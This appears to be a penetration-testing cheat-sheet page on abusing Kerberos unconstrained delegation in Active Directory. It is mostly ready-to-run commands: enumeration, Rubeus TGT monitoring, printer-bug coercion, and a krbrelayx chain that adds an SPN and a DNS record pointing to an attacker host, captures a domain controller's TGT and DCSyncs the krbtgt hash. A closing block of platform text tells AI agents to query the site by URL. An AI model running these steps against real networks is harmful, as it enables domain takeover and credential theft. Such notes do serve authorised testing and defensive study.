> For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/kud.md).

# Unconstrained

* <https://adsecurity.org/?p=1667>
* <https://ardent101.github.io/posts/kerberos_delegation/>

Enumerate:

```
PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol
```

## Monitor for TGTs

Coerce authentication from a DC while monitoring for TGTs in the background on the owned unconstrained delegation system:

```
Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local
```

Use [ticket\_converter](https://github.com/eloypgz/ticket_converter) or [ticketConverter.py](https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py) to convert the TGT from `.kirbi` to `.ccache` (usable with impacket):

```
$ python ticket_converter.py dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...
```

If output goes to the `/registry`:

```
PS > Get-ChildItem HKLM:\SOFTWARE\MONITOR\
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\DC01$@MEGACORP.LOCAL
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force
```

## "Relaying" Kerberos

* <https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/>

{% embed url="<https://snovvcrash.github.io/2021/05/21/calculating-kerberos-keys.html>" %}

{% file src="/files/rXFwBTJPrZSrLxiHsZup" %}

### Printer Bug + DCSync

Requirements:

* Owned computer account with unconstrained delegation enabled (SRV01).
* Printer bug on a domain controller (DC01).
* Permissions to add an SPN for the owned computer account and a new DNS record in AD.

1\. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with `secretsdump.py`, or it will be done later by `krbrelayx.py` when providing it the password in hex from local `secretsdump.py` output:

```
# Remotely
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
...
MEGACORP\SRV01$:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL
...
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<PLAIN_PASSWORD_HEX>
```

2\. Add a custom SPN for the owned computer account with unconstrained delegation:

```
# Check (no modifications)
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local

# Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local

# But modifying msDS-AdditionalDnsHostName will succeed
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
```

3\. Add a DNS record pointing to the attacker's host:

```
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
```

4\. Check that the record was added successfully (\~ 3 minutes):

```
$ nslookup evil.megacorp.local <DC01_IP>
Server:		192.168.1.11
Address:	192.168.1.11#53

Name:	evil.megacorp.local
Address: 10.10.13.37
```

5\. Start `krbrelayx.py` providing AES key of the owned computer account or its plain password in hex with salt:

```
# In case secretsdump.py was used remotely
$ sudo python krbrelayx.py -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# In case secretsdump.py was used locally
$ sudo python krbrelayx.py --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
```

6\. Coerce the authentication to attacker's host from DC01 by triggering printer bug:

```
$ python printerbug.py megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
```

7\. Export extracted TGT and perform DCSync to get krbtgt hash (or any other privileged account hash):

```
$ export KRB5CCNAME=`pwd`/'DC01$@MEGACORP.LOCAL_krbtgt@MEGACORP.LOCAL.ccache'
$ secretsdump.py DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
```

8\. Cleanup. Delete SPN and DNS record:

```
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local

# Check if the SPN was deleted successfully
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
```

Other scenarios:

* In [this](https://exploit.ph/user-constrained-delegation.html) blogpost it is described how to perform the attack by abusing a **service** (user) account with unconstrained delegation enabled.
* In [this](https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-is-useful-sometimes/) blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.
* In [this](https://nothingspecialforu.github.io/UCgMSAExploitation/) blogpost it is described how to perform the attack by abusing a **gMSA** (user) account with unconstrained delegation enabled.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/kud.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.